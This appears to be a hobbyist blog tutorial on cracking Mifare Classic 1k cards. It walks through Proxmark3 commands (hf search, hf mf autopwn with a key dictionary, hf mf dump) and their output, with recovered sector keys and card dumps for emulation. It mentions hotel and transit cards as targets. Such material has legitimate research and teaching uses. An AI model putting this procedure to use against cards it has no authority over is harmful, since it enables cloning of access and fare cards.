So, I thought it was about time for some quick fun with Mifare Classic 1k cards, and how to crack them.
Now, there's some hardware requirements for this, either you would need a Proxmark3, and a extended mifare key dictionary, or you could use something else, like a Flipper Zero.
But, also some patience, and a target key fob, card or something like it, based on Mifare Classic. (Yes, it could be an old hotel access card, public transportation card and so on..)
First, If you have the hardware covered, let's move on. If you're doing this on a Flipper Zero, simply just go to nfc --> read card, wait and you should be done. But let's try it with a Proxmark3 also.
Go get the extended key file and save it into your proxmark directory as ext-std.dic (The PM3 looks for a dic file extension). Next, connect your PM3, and place the tag.
Now, let's look for the tag, and see if it's there.
hf search
🕓 Searching for ISO14443-A tag...
[+] UID: CB 46 83 3C
[+] ATQA: 00 04
[+] SAK: 08 [2]
[+] Possible types:
[+] MIFARE Classic 1K
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Prng detection: hard
#TAG is obfuscated, not real tag :)Now, I'm lazy, so try the autopwn feature with the new dictionary.
hf mf autopwn --1k -f ext-std
[=] MIFARE Classic EV1 card detected
[=] target sector 17 key type B -- using valid key [ 4B 79 1B EA 7B CC ] (used for nested / hardnested attack)
[+] loaded 1462 keys from dictionary file ext-std.dic
[=] running strategy 1
[=] ......
[=] Chunk 12,1s | found 10/36 keys (85)
[=] Chunk 1,0s | found 10/36 keys (85)
[=] Chunk 1,1s | found 10/36 keys (85)
Now, let it run, if you see something like this (Here shortened a bit), output for all sectors, it means our proxmark cracked the keys for all sectors.
found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 001 | 007 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 002 | 011 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 005 | 023 | 6A1987C40A21 | D | 7F33625BC129 | D
[+] 006 | 027 | 6A1987C40A21 | D | 7F33625BC129 | D
If it found all the keys, it should make a binary dump, something like this respond will tell if it did.
Generating binary key file
[+] Found keys have been dumped to hf-mf-xxxxxxxx-key.bin
wrong response len 0 (expected 18)
[=] fast dump reported back failure w KEY B
[=] Dump file is PARTIAL complete
[=] downloading the card content from emulator memory
[+] saved 1024 bytes to binary file hf-mf-XXXXXXXX-dump.bin
[+] saved 64 blocks to text file hf-mf-XXXXXXXX-dump.eml
[+] saved to json file hf-mf-XXXXXXXX-dump.json
[=] autopwn execution time: 86 seconds
Here it tells us that it wrote our dumpfiles, so we can later reload them, or copy them to other devices. BUT note it said partial complete dump, so did we get everything ? We can try to fix this by running this next command.
[usb] pm3 --> hf mf dump
Using `hf-mf-XXXXXXXX-key.bin`
[=] Reading sector access bits...
[=] .................
[+] Finished reading sector access bits
[=] Dumping all blocks from card...
[+] successfully read block 0 of sector 0.
[+] successfully read block 1 of sector 0.
[+] successfully read block 2 of sector 0.
[+] successfully read block 3 of sector 0.
[+] successfully read block 0 of sector 1.
[+] successfully read block 1 of sector 1.
[+] successfully read block 2 of sector 1.
[+] successfully read block 3 of sector 1.
[+] successfully read block 0 of sector 2.
[+] successfully read block 1 of sec
And so on :)
When it's done, it will tell us that writing dump files succeeded.
Succeeded in dumping all blocks
[+] saved 1024 bytes to binary file hf-mf-XXXXXXXX-dump-1.bin
[+] saved 64 blocks to text file hf-mf-XXXXXXXX-dump-1.eml
[+] saved to json file hf-mf-XXXXXXXX-dump-1.json
[usb] pm3 -->
Now, go have a look at the json file and the eml file, they contains the raw data from the card, the eml file is for loading the card into the Proxmark simulator feature, the json can be importet / exported to other devices.
For some systems, they write to sectors on the tag, as a kind of security check, so dump the tags for each time you use it and try to run diff on the dumps, to see what changes between uses.
A couple of resources :
https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/cheatsheet.md
Have fun :)